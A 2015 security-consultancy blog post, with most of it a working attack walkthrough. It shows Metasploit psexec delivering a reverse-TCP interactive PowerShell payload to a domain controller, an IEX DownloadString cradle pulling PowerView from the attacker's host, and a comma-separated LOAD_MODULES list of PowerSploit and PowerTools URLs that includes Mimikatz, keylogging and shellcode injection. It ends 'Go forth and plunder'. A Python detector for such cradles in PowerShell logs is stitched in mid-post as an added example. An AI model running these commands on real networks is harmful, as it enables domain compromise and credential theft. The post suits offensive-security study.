June 26, 2015

Interactive PowerShell Sessions Within Meterpreter

Written by Larry Spohn
In case anyone missed it, Metasploit has a couple of new payloads that allow interactive PowerShell sessions. What does that mean? Previously, if you tried to open a PowerShell session within Meterpreter, there was no interaction between PowerShell and your session. Example:
msf exploit(psexec_psh) > exploit 

[*] Started HTTPS reverse handler on https://0.0.0.0:444/
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.81.10:49309 (UUID: 820e464723e817f9/x86=1/windows=1/2015-06-08T16:12:05Z) Staging Native payload ...
[*] Meterpreter session 23 opened (192.168.81.217:444 -> 192.168.81.10:49309) at 2015-06-08 12:12:05 -0400

meterpreter > shell
Process 2776 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>powershell
powershell
Windows PowerShell 
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

Get-ExecutionPolicy


Any command that you type seems to disappear into the ether. Now, thanks to the hard work of Ben Turner (@benpturner) and Dave Hardy (@davehardy20) at Nettitude, we have full interaction with PowerShell sessions! Their introduction to these modules is here. To find the new payloads within Metasploit, simply search for "Interactive_Powershell":
msf payload(reverse_powershell) > search Interactive_Powershell

Matching Modules
================

   Name                                        Disclosure Date  Rank    Description
   ----                                        ---------------  ----    -----------
   payload/cmd/windows/powershell_bind_tcp                      normal  Windows Interactive Powershell Session, Bind TCP
   payload/cmd/windows/powershell_reverse_tcp                   normal  Windows Interactive Powershell Session, Reverse TCP
   payload/windows/powershell_bind_tcp                          normal  Windows Interactive Powershell Session, Bind TCP
   payload/windows/powershell_reverse_tcp                       normal  Windows Interactive Powershell Session, Reverse TCP
Let's try a "Reverse TCP" payload:
msf exploit(psexec_psh) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(psexec_psh) > exploit 

[*] Started reverse handler on 192.168.81.217:444 
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 24 opened (192.168.81.217:444 -> 192.168.81.10:49317) at 2015-06-08 12:15:42 -0400

Windows PowerShell running as user PWNT-DC$ on PWNT-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>Get-ExecutionPolicy
Bypass
This allows us to use all of our favorite PowerShell tools, such as PowerSploit and PowerTools (included in Veil-Framework), from within a Meterpreter session. To avoid downloading the tools to disk, we use "Invoke-Expression" to run the tools directly in memory. I like to host them locally, as opposed to downloading them from the Internet.
PS C:\Windows\system32>IEX(New-Object Net.WebClient).DownloadString("http://192.168.81.217/PowerTools/PowerView/powerview.ps1")
PS C:\Windows\system32> Get-NetGroup "Domain Admins" |select UserName

UserName                                                                       
--------                                                                       
TrustedSec                                                                     
Administrator
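The defender's side of the in-memory loading shown above, as an added example that is not code from the original post: Invoke-Expression over DownloadString keeps the tool off disk, but PowerShell script block logging (Event ID 4104, ScriptBlockText) still records the command text, so a scan for an Invoke-Expression wrapped around a web fetch surfaces the cradle and the .ps1 URLs it pulls. The sample script blocks are constructed; the 192.168.81.217 URL is the one from the post.

```python
"""Scan PowerShell script block text (Event ID 4104) for download cradles.

Added example, not code from the original post: IEX over DownloadString keeps
the tool off disk, but script block logging still records the command text.
"""
import re
from typing import Dict, List

# Invoke-Expression (alias IEX) wrapped around a web fetch is the cradle in
# the post; a bare DownloadFile writes to disk and is not treated as one.
INVOKE_RE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE)
FETCH_RE = re.compile(
    r"Net\.WebClient\s*\)?\s*\.\s*Download(?:String|Data)"
    r"|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)

def analyze_script_block(text: str) -> Dict:
    """Classify one ScriptBlockText value and pull out the URLs it fetches."""
    urls = URL_RE.findall(text)
    return {
        "download_cradle": bool(INVOKE_RE.search(text) and FETCH_RE.search(text)),
        "urls": urls,
        "ps1_modules": [u for u in urls if u.lower().endswith(".ps1")],
    }

def scan_script_blocks(blocks: List[str]) -> List[Dict]:
    """Return the verdicts (tagged with their index) for blocks that are cradles."""
    hits = []
    for i, block in enumerate(blocks):
        verdict = analyze_script_block(block)
        if verdict["download_cradle"]:
            verdict["index"] = i
            hits.append(verdict)
    return hits

# Constructed sample ScriptBlockText values; the first is the cradle from the post.
SAMPLE_BLOCKS = [
    'IEX(New-Object Net.WebClient).DownloadString("http://192.168.81.217/PowerTools/PowerView/powerview.ps1")',
    'Get-NetGroup "Domain Admins" |select UserName',
    "Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer }",
    "(New-Object Net.WebClient).DownloadFile('http://example.invalid/a.txt', 'C:\\a.txt')",
    "Invoke-Expression (Invoke-WebRequest -Uri 'http://example.invalid/x.ps1').Content",
]

if __name__ == "__main__":
    for hit in scan_script_blocks(SAMPLE_BLOCKS):
        print(f"block {hit['index']}: cradle fetching {hit['ps1_modules'] or hit['urls']}")
```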
Instead of loading modules from within an existing session, the payloads also let you specify modules before the session is created by setting the "LOAD_MODULES" option:
Payload options (windows/powershell_reverse_tcp):

   Name          Current Setting                                           Required  Description
   ----          ---------------                                           --------  -----------
   EXITFUNC      thread                                                    yes       Exit technique (accepted: seh, thread, process, none)
   LHOST         192.168.81.217                                            yes       The listen address
   LOAD_MODULES  http://192.168.81.217/PowerTools/PowerView/powerview.ps1  no        A list of powershell modules seperated by a comma to download over the web
   LPORT         444                                                       yes       The listen port

msf exploit(psexec_psh) > exploit 

[*] Loading 1 modules into the interactive PowerShell session
[*] Started reverse handler on 192.168.81.217:444 
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 26 opened (192.168.81.217:444 -> 192.168.81.10:49391) at 2015-06-08 12:29:58 -0400

Windows PowerShell running as user PWNT-DC$ on PWNT-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> Get-NetForest


Name                  : pwnt.com
Sites                 : {Default-First-Site-Name}
Domains               : {pwnt.com}
GlobalCatalogs        : {pwnt-dc.pwnt.com}
ApplicationPartitions : {DC=DomainDnsZones,DC=pwnt,DC=com, DC=ForestDnsZones,DC
                        =pwnt,DC=com}
ForestMode            : Windows2008R2Forest
RootDomain            : pwnt.com
Schema                : CN=Schema,CN=Configuration,DC=pwnt,DC=com
SchemaRoleOwner       : pwnt-dc.pwnt.com
NamingRoleOwner       : pwnt-dc.pwnt.com
You can also load multiple modules all at once by providing a list separated by commas. I cloned the PowerSploit and PowerTools modules to my Apache root, so to enumerate all modules, I simply use "find" to list all PowerShell scripts recursively:
root@kali:~# find /var/www -name "*.ps1"
/var/www/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1
/var/www/PowerSploit/CodeExecution/Invoke-DllInjection.ps1
/var/www/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1
/var/www/PowerSploit/CodeExecution/Invoke--Shellcode.ps1
/var/www/PowerSploit/CodeExecution/Invoke-Shellcode.ps1
/var/www/PowerSploit/Recon/Invoke-Portscan.ps1
/var/www/PowerSploit/Recon/Get-ComputerDetails.ps1
/var/www/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1
/var/www/PowerSploit/Recon/Get-HttpStatus.ps1
/var/www/PowerSploit/AntivirusBypass/Find-AVSignature.ps1
/var/www/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1
/var/www/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1
/var/www/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1
/var/www/PowerSploit/Exfiltration/Out-Minidump.ps1
/var/www/PowerSploit/Exfiltration/Get-GPPPassword.ps1
/var/www/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
/var/www/PowerSploit/Exfiltration/Get-VaultCredential.ps1
/var/www/PowerSploit/Exfiltration/Get-Keystrokes.ps1
/var/www/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1
/var/www/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1
/var/www/PowerSploit/ScriptModification/Remove-Comments.ps1
/var/www/PowerSploit/ScriptModification/Out-EncodedCommand.ps1
/var/www/PowerSploit/ScriptModification/Out-CompressedDll.ps1
/var/www/PowerSploit/ScriptModification/Out-EncryptedScript.ps1
/var/www/PowerTools/PowerBreach/PowerBreach.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassTemplate.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassSearch.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassCommand.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassTokens.ps1
/var/www/PowerTools/PowerPick/PSInjector/DLLEnc.ps1
/var/www/PowerTools/PowerPick/PSInjector/PSInject.ps1
/var/www/PowerTools/PowerUp/PowerUp.ps1
/var/www/PowerTools/PowerView/functions/Invoke-UserHunter.ps1
/var/www/PowerTools/PowerView/functions/Get-NetShare.ps1
/var/www/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1
/var/www/PowerTools/PowerView/functions/Invoke-Netview.ps1
/var/www/PowerTools/PowerView/functions/Get-Net.ps1
/var/www/PowerTools/PowerView/functions/Get-NetSessions.ps1
/var/www/PowerTools/PowerView/functions/Get-NetLoggedon.ps1
/var/www/PowerTools/PowerView/powerview.ps1
To replace "/var/www" with your web host, use "sed":
root@kali:~# find /var/www -name "*.ps1" |sed 's_/var/www_http://192.168.81.217_'
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-DllInjection.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke--Shellcode.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-Shellcode.ps1
http://192.168.81.217/PowerSploit/Recon/Invoke-Portscan.ps1
http://192.168.81.217/PowerSploit/Recon/Get-ComputerDetails.ps1
http://192.168.81.217/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1
http://192.168.81.217/PowerSploit/Recon/Get-HttpStatus.ps1
http://192.168.81.217/PowerSploit/AntivirusBypass/Find-AVSignature.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Out-Minidump.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-GPPPassword.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-VaultCredential.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-Keystrokes.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1
http://192.168.81.217/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Remove-Comments.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-EncodedCommand.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-CompressedDll.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-EncryptedScript.ps1
http://192.168.81.217/PowerTools/PowerBreach/PowerBreach.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTemplate.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassSearch.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassCommand.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTokens.ps1
http://192.168.81.217/PowerTools/PowerPick/PSInjector/DLLEnc.ps1
http://192.168.81.217/PowerTools/PowerPick/PSInjector/PSInject.ps1
http://192.168.81.217/PowerTools/PowerUp/PowerUp.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-UserHunter.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetShare.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-Netview.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-Net.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetSessions.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetLoggedon.ps1
http://192.168.81.217/PowerTools/PowerView/powerview.ps1
To create a comma separated list, use "tr":
root@kali:~# find /var/www -name "*.ps1" |sed 's_/var/www_http://192.168.81.217_' |tr '\n' ','
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-DllInjection.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke--Shellcode.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-Shellcode.ps1,http://192.168.81.217/PowerSploit/Recon/Invoke-Portscan.ps1,http://192.168.81.217/PowerSploit/Recon/Get-ComputerDetails.ps1,http://192.168.81.217/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1,http://192.168.81.217/PowerSploit/Recon/Get-HttpStatus.ps1,http://192.168.81.217/PowerSploit/AntivirusBypass/Find-AVSignature.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Out-Minidump.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-GPPPassword.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-VaultCredential.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-Keystrokes.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1,http://192.168.81.217/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Remove-Comments.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-EncodedCommand.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-CompressedDll.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-EncryptedScript.ps1,http://192.168.81.217/PowerTools/PowerBreach/PowerBreach.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTemplate.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassSearch.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassCommand.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTokens.ps1,http://192.168.81.217/PowerTools/PowerPick/PSInjector/DLLEnc.ps1,http://192.168.81.217/PowerTools/PowerPick/PSInjector/PSInject.ps1,http://192.168.81.217/PowerTools/PowerUp/PowerUp.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-UserHunter.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetShare.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-Netview.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-Net.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetSessions.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetLoggedon.ps1,http://192.168.81.217/PowerTools/PowerView/powerview.ps1,
Copy/paste that output into your "LOAD_MODULES" parameter and all the PowerShell goodness is at your fingertips. Go forth and plunder!!!

This article was written by Larry Spohn @Spoonman1091 | Senior Principal Security Consultant.